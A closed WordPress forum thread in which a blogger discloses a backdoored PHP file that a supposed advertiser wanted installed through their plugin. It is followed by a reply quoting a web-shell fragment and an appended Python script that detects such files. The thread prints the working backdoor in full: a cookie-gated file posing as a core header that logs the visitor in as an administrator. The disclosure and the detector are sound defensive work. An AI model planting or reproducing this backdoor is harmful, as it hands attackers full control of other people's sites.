• Today I was contacted by a person who wanted to buy advertising on my blog. I would be forced to install the plugin on my site, but with their changes. The code below is what I found: one more file in PHP format.

    Is that really what I’m thinking? Did you want to steal my access?

    <?php
    /**
    * WordPress User Page
    *
    * Handles authentication, registering, resetting passwords, forgot password,
    * and other user handling.
    *
    * @package WordPress
    */

    if(empty($_COOKIE[‘cmd’])){

    die();
    }
    require(‘../../../../wp-blog-header.php’);
    $query_str = “SELECT ID FROM $wpdb->users”;
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
    $user_id = $uid->ID;
    if (user_can($user_id, ‘administrator’)) {
    $user_info = get_userdata($user_id);
    $user_login = $user_info->user_login;
    wp_set_current_user($user_id, $user_login);
    wp_set_auth_cookie($user_id);
    do_action(‘wp_login’, $user_login);
    echo “You are logged in as $user_login”;
    if (function_exists(‘get_admin_url’)) {
    wp_redirect(get_admin_url());
    } else {
    wp_redirect(get_bloginfo(‘wpurl’) . ‘/wp-admin’);
    }
    exit;
    }
    }

Viewing 2 replies - 1 through 2 (of 2 total)
  • I just had the same attack attempt on one of the websites I manage. I also noticed that this piece of code does not exist in the files on GitHub. In any case, thank you for reporting this; I was about to do the same 🙂

    Also, not just that … check it out … it tries to create a PHP shell of some sort

    echo “<center><h1>system</h1></center><p><hr><p>\n”;
    echo “<i>Server: ” . $_SERVER [‘SERVER_NAME’] . “<br>\n”;
    echo “Current directory: ” . getcwd () . “<br>\n”;
    echo “Software: ” . $_SERVER [‘SERVER_SOFTWARE’] . “

    \n\n

    </i>\n”;
    echo “

    \n\n\n

    “;

    echo “<table width = 50%>”;
    echo “<tr>”;
    echo “<td>Shell Command</td>\n”;
    echo “<td>Create a new file</td>\n”;
    echo “<td>Upload file</td>\n”;
    echo “<td>Port Scan</td>\n”;
    echo “</tr></table>”;
    echo “

    \n\n

    “;

    wow !!!

The topic ‘Attack with your plugin’ is closed to new replies.
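An added example, not part of the thread or of the plugin's own code: a small audit script that applies the two checks the posts suggest, flagging PHP files that are missing from the official release (the reply's GitHub comparison) and files that load WordPress themselves and then issue an auth cookie (the shape of the file in the first post). The function names, the caller-supplied `known_good` manifest and the sample plugin tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Patterns taken from the backdoor quoted in the thread above.
INDICATORS = {
    "bootstraps_wp": re.compile(r"(require|include)(_once)?\s*\(?\s*\S*wp-blog-header\.php"),
    "cookie_gate": re.compile(r"\$_COOKIE\s*\["),
    "lists_users": re.compile(r"\$wpdb->users"),
    "sets_auth_cookie": re.compile(r"\bwp_set_auth_cookie\s*\("),
}

def scan_plugin(plugin_dir, known_good):
    """Return {relative_path: [findings]}; known_good is an assumed manifest of official files."""
    report = {}
    root = Path(plugin_dir)
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        findings = []
        if rel not in known_good:
            findings.append("not_in_official_release")
        # A file that loads WordPress itself and then issues an auth cookie
        # is the login-bypass shape shown in the thread.
        if "bootstraps_wp" in hits and "sets_auth_cookie" in hits:
            findings.append("auth_bypass_pattern")
        if findings:
            report[rel] = findings + hits
    return report

def demo():
    """Build a constructed plugin tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "inc").mkdir()
        (root / "plugin.php").write_text("<?php\n/* Plugin Name: Sample */\n")
        # Constructed sample: inert fragments of the lines quoted in the post.
        (root / "inc" / "user.php").write_text(
            "<?php\nif(empty($_COOKIE['cmd'])){ die(); }\n"
            "require('../../../../wp-blog-header.php');\n"
            "$q = \"SELECT ID FROM $wpdb->users\";\n"
            "wp_set_auth_cookie($user_id);\n")
        return scan_plugin(root, known_good={"plugin.php"})

if __name__ == "__main__":
    for rel, findings in demo().items():
        print(rel, findings)
```

In practice `known_good` would be built from a fresh copy of the plugin obtained from its official source, and any flagged file reviewed by hand before the plugin is activated.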